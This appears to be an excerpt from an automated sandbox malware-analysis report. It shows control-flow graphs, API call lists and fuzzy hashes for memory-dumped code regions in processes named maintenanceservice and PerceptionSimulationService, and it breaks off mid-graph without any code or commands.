                                                                                                                                                          control_flow_graph 474 cd8318-cd831c 475 cd81e5 474->475 476 cd8322 474->476 477 cd81eb 475->477 478 cd82a3-cd82a5 475->478 476->475 479 cd8328-cd832c 476->479 482 cd81f1 477->482 483 cd82b2-cd836f GetTokenInformation 477->483 480 cd83f9 478->480 481 cd82ab 478->481 484 cd832e-cd8330 479->484 485 cd82c5-cd82c8 479->485 486 cd83ff 480->486 487 cd82d2-cd82d7 480->487 481->480 490 cd82b1 481->490 482->483 491 cd81f7-cd828e 482->491 503 cd8376-cd837b 483->503 488 cd82dd-cd82e3 484->488 489 cd8332 484->489 485->480 493 cd82ce 485->493 497 cdf524-cdf52e 486->497 496 cd8306-cd8309 487->496 494 cd82e9 488->494 495 cd83a3-cd83a4 488->495 489->488 498 cd8334 489->498 490->483 500 cd828f-cd8303 call d072ec 491->500 493->500 501 cd82d0 493->501 494->495 502 cd82ef 494->502 496->484 504 cd830b-cd8311 CloseHandle 496->504 506 cdf807 497->506 498->497 500->496 517 cd834f-cd8355 500->517 501->487 501->500 510 cd82f0-cd831c 502->510 509 cd8381 503->509 503->510 504->484 507 cdf80d 506->507 508 cdf8df-cdf8e0 506->508 507->508 512 cdf813 507->512 520 ce15a5-ce15aa 508->520 509->510 514 cd8387 509->514 510->475 510->476 528 cdf78f 512->528 529 cdf81b 512->529 518 cd8277-cd827a 514->518 519 cd8390-cd8393 514->519 532 cd8341 517->532 533 cd8212-cd821a GetTokenInformation 517->533 521 cd827c 518->521 522 cd8241 518->522 524 cd827e 519->524 525 cd8399 519->525 527 ce15ae-ce15af 520->527 521->522 521->524 522->503 535 cd8251-cd8260 call d072f4 522->535 524->504 530 cd8284 524->530 525->524 531 cd839f-cd83a1 525->531 534 ce15b2-ce15b7 527->534 528->529 536 cdf795 528->536 529->508 530->484 531->495 532->533 540 cd8347 532->540 538 cd83af 533->538 539 cd8220-cd8234 533->539 541 ce15ba-ce15c1 534->541 535->519 536->506 538->535 543 cd83b5 538->543 564 cd823a 539->564 565 cd83d7-cd83dd 539->565 545 cd834d 540->545 546 ce1638-ce1640 540->546 547 ce15c7-ce15d2 541->547 548 ce1750-ce17a2 call d072f4 541->548 543->535 553 cd83bb-cd83ca 543->553 545->517 551 ce170e-ce1727 546->551 552 ce1646-ce165f 546->552 549 ce15d4-ce15d6 547->549 550 ce1620-ce1623 547->550 557 ce15dc-ce15df 549->557 558 ce1670-ce1684 549->558 559 ce1625-ce1628 550->559 560 ce16a0-ce16b4 550->560 551->547 561 ce172d 551->561 552->547 562 ce1665 552->562 553->518 587 cd83d0 553->587 557->541 566 ce15e1-ce15f6 557->566 558->520 568 ce168a-ce168d 558->568 559->541 567 ce162a-ce1636 559->567 569 ce16b6-ce16b9 560->569 570 ce16f4-ce16f5 560->570 561->548 562->548 564->565 573 cd8240 564->573 574 ce15fc-ce1600 566->574 575 ce16d2-ce16d7 566->575 567->546 576 ce16dc-ce16ec 567->576 577 ce172f-ce1738 568->577 578 ce1693-ce1697 568->578 571 ce173a-ce173b 569->571 572 ce16bb 569->572 583 ce16fe-ce170c 570->583 586 ce173f-ce1740 571->586 580 ce16bf-ce16cd 572->580 582 ceb32e-ceb330 573->582 574->583 584 ce1606-ce1618 574->584 575->527 576->547 585 ce16f2 576->585 577->586 578->580 590 ceb332-ceb337 call d072f4 582->590 591 ceb300 582->591 589 ce1744-ce1748 583->589 584->534 585->548 586->589 587->518 588 cd83d6 587->588 588->565 590->591 599 ceb339 590->599 594 ceb2fd 591->594 595 ceb302 591->595 597 ceb2ff 594->597 598 ceb305 594->598 600 ceb308-ceb315 597->600 598->600 601 ceb322-ceb32d 598->601 599->591 602 ceb33b-ceb33f 599->602 600->598 604 ceb317 600->604 601->582 602->600 604->594
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE ref: 00CD830B
                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00CD8369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.1643826916.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction ID: 8853705f865801889a4ed1407f11f40ca3a140afde99b88ea8d58091b8678e89
                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0903440DA418B8A258A15D88053A77A0BF22750B6C005FC76BCB362DE24DF0BE763

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:56
                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                          execution_graph 3914 bc58de 3915 bd53f0 VirtualAlloc 3914->3915 3916 bc58f9 3915->3916 3917 bc81c0 3 API calls 3916->3917 3918 bc5907 3917->3918 3862 bc5b8f 3873 bd53f0 3862->3873 3864 bc5baf 3878 bc81c0 3864->3878 3866 bc5c2c 3867 bc5c84 3884 bc5990 3867->3884 3869 bc5dcd 3869->3869 3870 bc5d56 CreateThread 3872 bc5bbc 3870->3872 3871 bc5cd4 CreateThread CloseHandle 3871->3872 3872->3866 3872->3867 3872->3870 3872->3871 3874 bd53f4 3873->3874 3875 bd545e VirtualAlloc 3874->3875 3877 bd53f6 3874->3877 3876 bd5460 3875->3876 3876->3874 3877->3864 3881 bc81e5 3878->3881 3879 bc8357 GetTokenInformation 3879->3881 3880 bc830b CloseHandle 3880->3881 3881->3872 3881->3879 3881->3880 3882 bc8212 GetTokenInformation 3881->3882 3883 bc81f7 3881->3883 3882->3881 3883->3872 3885 bc5994 wcscpy 3884->3885 3886 bc5a23 3885->3886 3887 bc5a8d VirtualAlloc 3885->3887 3886->3869 3887->3885 3888 bc83e7 3891 bc81e5 3888->3891 3889 bc830b CloseHandle 3889->3891 3890 bc8212 GetTokenInformation 3890->3891 3891->3889 3891->3890 3892 bc8357 GetTokenInformation 3891->3892 3893 bc81f7 3891->3893 3892->3891 3894 bc5d50 CreateThread 3901 bc5bbc 3894->3901 3895 bc5cd4 CreateThread CloseHandle 3895->3901 3896 bc5c84 3898 bc5990 VirtualAlloc 3896->3898 3897 bc5c2c 3899 bc5dcd 3898->3899 3899->3899 3900 bc5d56 CreateThread 3900->3901 3901->3895 3901->3896 3901->3897 3901->3900 3919 bc5d22 3920 bc5cd4 CreateThread CloseHandle 3919->3920 3921 bc5bbc 3919->3921 3920->3921 3921->3920 3922 bc5c2c 3921->3922 3923 bc5d56 CreateThread 3921->3923 3924 bc5c84 3921->3924 3923->3921 3925 bc5990 VirtualAlloc 3924->3925 3926 bc5dcd 3925->3926 3926->3926 3908 bc81e3 3911 bc81e5 3908->3911 3909 bc8357 GetTokenInformation 3909->3911 3910 bc830b CloseHandle 3910->3911 3911->3909 3911->3910 3912 bc8212 GetTokenInformation 3911->3912 3913 bc81f7 3911->3913 3912->3911

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 bc81c0-bc81d8 1 bc83bf-bc83ca 0->1 2 bc81e5 0->2 14 bc8277-bc827a 1->14 15 bc83d0 1->15 3 bc81eb 2->3 4 bc82a3-bc82a5 2->4 7 bc81f1 3->7 8 bc82b2-bc82bc 3->8 5 bc83f9 4->5 6 bc82ab 4->6 16 bc83ff 5->16 17 bc82d2-bc82d7 5->17 6->5 10 bc82b1 6->10 7->8 13 bc81f7-bc828e 7->13 11 bc82c5-bc82c8 8->11 12 bc8357-bc836f GetTokenInformation 8->12 10->8 11->5 20 bc82ce 11->20 30 bc8376-bc837b 12->30 21 bc827c 14->21 22 bc8241 14->22 15->14 24 bc83d6 15->24 18 bcf524-bcf52e 16->18 19 bc8306-bc8309 17->19 31 bcf807 18->31 25 bc832e-bc8330 19->25 26 bc830b-bc8311 CloseHandle 19->26 27 bc828f-bc8303 call bf72ec 20->27 28 bc82d0 20->28 21->22 29 bc827e 21->29 22->30 32 bc8251-bc8256 call bf72f4 22->32 38 bc82dd-bc82e3 25->38 39 bc8332 25->39 26->25 27->19 60 bc834f-bc8355 27->60 28->17 28->27 29->26 37 bc8284 29->37 40 bc82f0-bc831c 30->40 41 bc8381 30->41 34 bcf80d 31->34 35 bcf8df-bcf8e0 31->35 44 bc825b-bc8260 32->44 34->35 43 bcf813 34->43 53 bd15a5-bd15aa 35->53 37->25 45 bc82e9 38->45 46 bc83a3-bc83a4 38->46 39->38 47 bc8334 39->47 40->2 61 bc8322 40->61 41->40 48 bc8387 41->48 58 bcf78f 43->58 59 bcf81b 43->59 52 bc8390-bc8393 44->52 45->46 54 bc82ef 45->54 46->18 47->18 48->14 48->52 52->29 56 bc8399 52->56 57 bd15ae-bd15af 53->57 54->40 56->29 63 bc839f-bc83a1 56->63 64 bd15b2-bd15b7 57->64 58->59 65 bcf795 58->65 59->35 67 bc8341 60->67 68 bc8212-bc821a GetTokenInformation 60->68 61->2 66 bc8328-bc832c 61->66 63->46 69 bd15ba-bd15c1 64->69 65->31 66->11 66->25 67->68 70 bc8347 67->70 71 bc83af 68->71 72 bc8220-bc8234 68->72 73 bd15c7-bd15d2 69->73 74 bd1750-bd17a2 call bf72f4 69->74 75 bc834d 70->75 76 bd1638-bd1640 70->76 71->32 77 bc83b5 71->77 103 bc823a 72->103 104 bc83d7-bc83dd 72->104 80 bd15d4-bd15d6 73->80 81 bd1620-bd1623 73->81 75->60 86 bd170e-bd1727 76->86 87 bd1646-bd165f 76->87 77->32 88 bc83bb-bc83bd 77->88 82 bd15dc-bd15df 80->82 83 bd1670-bd1684 80->83 84 bd1625-bd1628 81->84 85 bd16a0-bd16b4 81->85 82->69 90 bd15e1-bd15f6 82->90 83->53 94 bd168a-bd168d 83->94 84->69 91 bd162a-bd1636 84->91 96 bd16f4-bd16f5 85->96 97 bd16b6-bd16b9 85->97 86->73 92 bd172d 86->92 87->73 93 bd1665 87->93 88->1 98 bd15fc-bd1600 90->98 99 bd16d2-bd16d7 90->99 91->76 100 bd16dc-bd16ec 91->100 92->74 93->74 101 bd172f-bd1738 94->101 102 bd1693-bd1697 94->102 108 bd16fe-bd170c 96->108 105 bd16bb 97->105 106 bd173a-bd173b 97->106 98->108 109 bd1606-bd1618 98->109 99->57 100->73 110 bd16f2 100->110 111 bd173f-bd1740 101->111 107 bd16bf-bd16cd 102->107 103->104 112 bc8240 103->112 104->5 105->107 106->111 115 bd1744-bd1748 108->115 109->64 110->74 111->115 113 bdb32e-bdb330 112->113 116 bdb300 113->116 117 bdb332-bdb337 call bf72f4 113->117 120 bdb2fd 116->120 121 bdb302 116->121 117->116 125 bdb339 117->125 123 bdb2ff 120->123 124 bdb305 120->124 126 bdb308-bdb315 123->126 124->126 127 bdb322-bdb32d 124->127 125->116 128 bdb33b-bdb33f 125->128 126->124 130 bdb317 126->130 127->113 128->126 130->120
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction ID: 3fc764baab7115f989461f92f4bd525d4bb634849cc2351aaf32b77c5993c44b
                                                                                                                                                          • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction Fuzzy Hash: 8DB1163050CA859BDB29CB1C84C4B75F7E2FFD5314F2886DED49B8B266EE249C029356

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 131 bc5b8f-bc5c20 call bd53f0 call bf8358 call be0320 call bc81c0 141 bc5cf4-bc5d08 call bf72ec 131->141 142 bc5c26 131->142 146 bc5d0e 141->146 147 bc5c87-bc5dc8 call bc5e60 call bc5990 141->147 142->141 143 bc5c2c-bc5c2f 142->143 146->147 149 bc5d14-bc5d18 146->149 159 bc5dcd 147->159 153 bc5daf-bc5db6 call bc52d0 149->153 154 bc5c65 149->154 165 bc5dbc 153->165 166 bc5c30-bc5c39 153->166 156 bc5c67 154->156 157 bc5ca3 call bc5df0 154->157 156->157 161 bc5c69-bc5c9d 156->161 168 bc5c45-bc5d6d call be1520 157->168 159->159 179 bc5c9f 161->179 180 bc5c85 161->180 169 bc5d7d-bc5d89 165->169 170 bc5dbe 165->170 182 bc5cb9-bc5cbd 166->182 183 bc5bf7 166->183 188 bc5bfd-bc5c06 168->188 193 bc5d73 168->193 176 bc5d8b-bc5d92 169->176 177 bc5d94 169->177 170->169 178 bc5d9b 170->178 176->177 184 bc5d9c 176->184 177->143 191 bc5cb3 177->191 178->184 179->180 186 bc5ca1 179->186 180->147 189 bc5d56-bc5d5b CreateThread 182->189 190 bc5cc3 182->190 183->182 183->188 195 bc5da5-bc5da8 184->195 186->157 188->195 197 bc5c7e 189->197 198 bc5d1f-bc5d45 189->198 190->189 194 bc5cc9 190->194 191->143 191->182 193->188 199 bc5d79-bc5d7b 193->199 194->189 195->153 197->198 200 bc5c84 197->200 202 bc5cd4-bc5cea CreateThread CloseHandle 198->202 203 bc5d47 198->203 199->169 200->180 202->176 205 bc5cf0-bc5d4d 202->205 203->202 205->177
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction ID: 2fefd28bfc0ac65068a2f0e14dfd8ffa452268d0bc805082f68ee68463b381bf
                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction Fuzzy Hash: F141F720618F098FDB789B2C8899F7A36D1EB59310F6801FED017CB1A2DE64BCC48756

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 207 bc5d22-bc5d45 208 bc5cd4-bc5cea CreateThread CloseHandle 207->208 209 bc5d47 207->209 211 bc5d8b-bc5d92 208->211 212 bc5cf0-bc5d4d 208->212 209->208 214 bc5d9c 211->214 215 bc5d94 211->215 212->215 217 bc5da5-bc5db6 call bc52d0 214->217 218 bc5c2c-bc5c2f 215->218 219 bc5cb3 215->219 230 bc5dbc 217->230 231 bc5c30-bc5c39 217->231 219->218 220 bc5cb9-bc5cbd 219->220 222 bc5d56-bc5d5b CreateThread 220->222 223 bc5cc3 220->223 228 bc5c7e 222->228 229 bc5d1f-bc5d45 222->229 223->222 226 bc5cc9 223->226 226->222 228->229 232 bc5c84-bc5dc8 call bc5e60 call bc5990 228->232 229->208 229->209 235 bc5d7d-bc5d89 230->235 236 bc5dbe 230->236 231->220 243 bc5bf7 231->243 250 bc5dcd 232->250 235->211 235->215 236->235 242 bc5d9b 236->242 242->214 243->220 245 bc5bfd-bc5c06 243->245 245->217 250->250
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction ID: d88981da92654d59cdb8bea89d6495110c386a98ab1c6c4e3fe9e6ff36679307
                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction Fuzzy Hash: C8F0F66061CF0545DB3C87388899F3B61C1E799331FA407FED017C90D0DE2879C19246

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 251 bc5d50-bc5d5b CreateThread 252 bc5c78 251->252 253 bc5c7e 252->253 254 bc5d1f-bc5d45 252->254 253->254 255 bc5c84-bc5dc8 call bc5e60 call bc5990 253->255 257 bc5cd4-bc5cea CreateThread CloseHandle 254->257 258 bc5d47 254->258 276 bc5dcd 255->276 262 bc5d8b-bc5d92 257->262 263 bc5cf0-bc5d4d 257->263 258->257 266 bc5d9c 262->266 267 bc5d94 262->267 263->267 271 bc5da5-bc5db6 call bc52d0 266->271 272 bc5c2c-bc5c2f 267->272 273 bc5cb3 267->273 283 bc5dbc 271->283 284 bc5c30-bc5c39 271->284 273->272 275 bc5cb9-bc5cbd 273->275 278 bc5d56-bc5d5b CreateThread 275->278 279 bc5cc3 275->279 276->276 278->252 279->278 281 bc5cc9 279->281 281->278 286 bc5d7d-bc5d89 283->286 287 bc5dbe 283->287 284->275 292 bc5bf7 284->292 286->262 286->267 287->286 291 bc5d9b 287->291 291->266 292->275 293 bc5bfd-bc5c06 292->293 293->271
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction ID: 34288da663fb3a66de5bd65d19b8504c7d5b99147a590d9d6ea624a0cf089026
                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction Fuzzy Hash: 40B0120042AF87550235133084C8F2B05C4FE46378D741FFC8F73069D2E8043C886722

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 295 bc5990-bc599b 297 bc59a1 295->297 298 bc5a33-bc5a61 call bf9b00 295->298 297->298 299 bc59a7-bc59ab 297->299 309 bc5ab4-bc5aba call be1080 298->309 310 bc5a63 298->310 303 bc5a59 299->303 304 bc59b1-bc59f3 call bf2320 299->304 306 bc5a5b 303->306 307 bc5a25-bc5a2d 303->307 304->303 325 bc59f5-bc59fa 304->325 306->307 317 bc5a23 306->317 315 bc5a2f 307->315 316 bc5a70-bc5a7b 307->316 328 bc5a83-bc5a88 call bc5df0 309->328 331 bc5a13 309->331 310->309 313 bc5a65 310->313 313->316 315->313 318 bc5a7d 316->318 319 bc5a16-bc5a1e call be1470 316->319 323 bc5a24 317->323 318->319 324 bc5a7f-bc5a81 318->324 333 bc5a96-bc5ac2 319->333 324->328 329 bc59fc 325->329 330 bc5a51-bc5a54 call bf233c 325->330 337 bc5a8d VirtualAlloc 328->337 329->330 335 bc59fe-bc5a02 329->335 330->303 331->328 332 bc5a15 331->332 332->319 333->323 339 bc5ac8 333->339 335->330 337->333 339->323 340 bc5ace 339->340 340->298
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction ID: 3d74ffc56058fec1c4bc4ce04c147ee81e1c7f5cd86f26d735169ec6bd1beefb
                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction Fuzzy Hash: 11210C3161DE888FC77A931A48D1FB526E2F795324F9803DFF08AC7192C9287DC58656

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 bc8245-bc8247 343 bc824d-bc824f 342->343 344 bc82d2-bc82d7 342->344 345 bc8251-bc8260 call bf72f4 343->345 346 bc8306-bc8309 344->346 353 bc8390-bc8393 345->353 348 bc832e-bc8330 346->348 349 bc830b-bc8311 CloseHandle 346->349 351 bc82dd-bc82e3 348->351 352 bc8332 348->352 349->348 354 bc82e9 351->354 355 bc83a3-bc83a4 351->355 352->351 356 bc8334 352->356 357 bc827e 353->357 358 bc8399 353->358 354->355 359 bc82ef 354->359 360 bcf524-bcf52e 355->360 356->360 357->349 361 bc8284 357->361 358->357 362 bc839f-bc83a1 358->362 366 bc82f0-bc831c 359->366 363 bcf807 360->363 361->348 362->355 364 bcf80d 363->364 365 bcf8df-bcf8e0 363->365 364->365 367 bcf813 364->367 370 bd15a5-bd15aa 365->370 375 bc81e5 366->375 376 bc8322 366->376 373 bcf78f 367->373 374 bcf81b 367->374 372 bd15ae-bd15af 370->372 377 bd15b2-bd15b7 372->377 373->374 378 bcf795 373->378 374->365 380 bc81eb 375->380 381 bc82a3-bc82a5 375->381 376->375 379 bc8328-bc832c 376->379 382 bd15ba-bd15c1 377->382 378->363 379->348 383 bc82c5-bc82c8 379->383 386 bc81f1 380->386 387 bc82b2-bc82bc 380->387 384 bc83f9 381->384 385 bc82ab 381->385 388 bd15c7-bd15d2 382->388 389 bd1750-bd17a2 call bf72f4 382->389 383->384 390 bc82ce 383->390 384->344 395 bc83ff 384->395 385->384 391 bc82b1 385->391 386->387 393 bc81f7-bc828e 386->393 387->383 392 bc8357-bc836f GetTokenInformation 387->392 396 bd15d4-bd15d6 388->396 397 bd1620-bd1623 388->397 402 bc828f-bc8303 call bf72ec 390->402 403 bc82d0 390->403 391->387 410 bc8376-bc837b 392->410 395->360 398 bd15dc-bd15df 396->398 399 bd1670-bd1684 396->399 400 bd1625-bd1628 397->400 401 bd16a0-bd16b4 397->401 398->382 406 bd15e1-bd15f6 398->406 399->370 409 bd168a-bd168d 399->409 400->382 408 bd162a-bd1636 400->408 411 bd16f4-bd16f5 401->411 412 bd16b6-bd16b9 401->412 402->346 436 bc834f-bc8355 402->436 403->344 403->402 413 bd15fc-bd1600 406->413 414 bd16d2-bd16d7 406->414 416 bd16dc-bd16ec 408->416 417 bd1638-bd1640 408->417 418 bd172f-bd1738 409->418 419 bd1693-bd1697 409->419 410->366 420 bc8381 410->420 424 bd16fe-bd170c 411->424 421 bd16bb 412->421 422 bd173a-bd173b 412->422 413->424 425 bd1606-bd1618 413->425 414->372 416->388 426 bd16f2 416->426 428 bd170e-bd1727 417->428 429 bd1646-bd165f 417->429 430 bd173f-bd1740 418->430 423 bd16bf-bd16cd 419->423 420->366 431 bc8387 420->431 421->423 422->430 432 bd1744-bd1748 424->432 425->377 426->389 428->388 433 bd172d 428->433 429->388 434 bd1665 429->434 430->432 431->353 435 bc8277-bc827a 431->435 433->389 434->389 437 bc827c 435->437 438 bc8241 435->438 440 bc8341 436->440 441 bc8212-bc821a GetTokenInformation 436->441 437->357 437->438 438->345 438->410 440->441 442 bc8347 440->442 443 bc83af 441->443 444 bc8220-bc8234 441->444 442->417 445 bc834d 442->445 443->345 446 bc83b5 443->446 451 bc823a 444->451 452 bc83d7-bc83dd 444->452 445->436 446->345 448 bc83bb-bc83ca 446->448 448->435 457 bc83d0 448->457 451->452 454 bc8240 451->454 452->384 455 bdb32e-bdb330 454->455 458 bdb300 455->458 459 bdb332-bdb337 call bf72f4 455->459 457->435 460 bc83d6 457->460 463 bdb2fd 458->463 464 bdb302 458->464 459->458 468 bdb339 459->468 466 bdb2ff 463->466 467 bdb305 463->467 469 bdb308-bdb315 466->469 467->469 470 bdb322-bdb32d 467->470 468->458 471 bdb33b-bdb33f 468->471 469->467 473 bdb317 469->473 470->455 471->469 473->463
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction ID: bda1ad7b56f0a7ac8589c8ab2c5d681755e1cef6cb4798767a83cdbb00da10e7
                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction Fuzzy Hash: A0F0A43450DA83CFCA2687189094F3A6BE2EF91710B5950DEE446CF163CE14DC05E792

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 605 bc83e7-bc83e9 606 bc83ef 605->606 607 bc82c5-bc82c8 605->607 606->607 610 bc83f5-bc83f7 606->610 608 bc82ce 607->608 609 bc83f9 607->609 611 bc828f-bc8303 call bf72ec 608->611 612 bc82d0 608->612 613 bc83ff 609->613 614 bc82d2-bc82d7 609->614 610->609 617 bc8306-bc8309 611->617 631 bc834f-bc8355 611->631 612->611 612->614 615 bcf524-bcf52e 613->615 614->617 621 bcf807 615->621 619 bc832e-bc8330 617->619 620 bc830b-bc8311 CloseHandle 617->620 625 bc82dd-bc82e3 619->625 626 bc8332 619->626 620->619 622 bcf80d 621->622 623 bcf8df-bcf8e0 621->623 622->623 627 bcf813 622->627 634 bd15a5-bd15aa 623->634 628 bc82e9 625->628 629 bc83a3-bc83a4 625->629 626->625 630 bc8334 626->630 639 bcf78f 627->639 640 bcf81b 627->640 628->629 635 bc82ef 628->635 629->615 630->615 636 bc8341 631->636 637 bc8212-bc821a GetTokenInformation 631->637 638 bd15ae-bd15af 634->638 645 bc82f0-bc831c 635->645 636->637 641 bc8347 636->641 642 bc83af 637->642 643 bc8220-bc8234 637->643 644 bd15b2-bd15b7 638->644 639->640 646 bcf795 639->646 640->623 647 bc834d 641->647 648 bd1638-bd1640 641->648 649 bc83b5 642->649 650 bc8251-bc8256 call bf72f4 642->650 676 bc823a 643->676 677 bc83d7-bc83dd 643->677 652 bd15ba-bd15c1 644->652 671 bc81e5 645->671 672 bc8322 645->672 646->621 647->631 655 bd170e-bd1727 648->655 656 bd1646-bd165f 648->656 649->650 657 bc83bb-bc83ca 649->657 661 bc825b-bc8260 650->661 658 bd15c7-bd15d2 652->658 659 bd1750-bd17a2 call bf72f4 652->659 655->658 662 bd172d 655->662 656->658 663 bd1665 656->663 705 bc8277-bc827a 657->705 706 bc83d0 657->706 667 bd15d4-bd15d6 658->667 668 bd1620-bd1623 658->668 673 bc8390-bc8393 661->673 662->659 663->659 669 bd15dc-bd15df 667->669 670 bd1670-bd1684 667->670 674 bd1625-bd1628 668->674 675 bd16a0-bd16b4 668->675 669->652 679 bd15e1-bd15f6 669->679 670->634 684 bd168a-bd168d 670->684 685 bc81eb 671->685 686 bc82a3-bc82a5 671->686 672->671 680 bc8328-bc832c 672->680 682 bc827e 673->682 683 bc8399 673->683 674->652 681 bd162a-bd1636 674->681 688 bd16f4-bd16f5 675->688 689 bd16b6-bd16b9 675->689 676->677 690 bc8240 676->690 677->609 692 bd15fc-bd1600 679->692 693 bd16d2-bd16d7 679->693 680->607 680->619 681->648 694 bd16dc-bd16ec 681->694 682->620 695 bc8284 682->695 683->682 696 bc839f-bc83a1 683->696 697 bd172f-bd1738 684->697 698 bd1693-bd1697 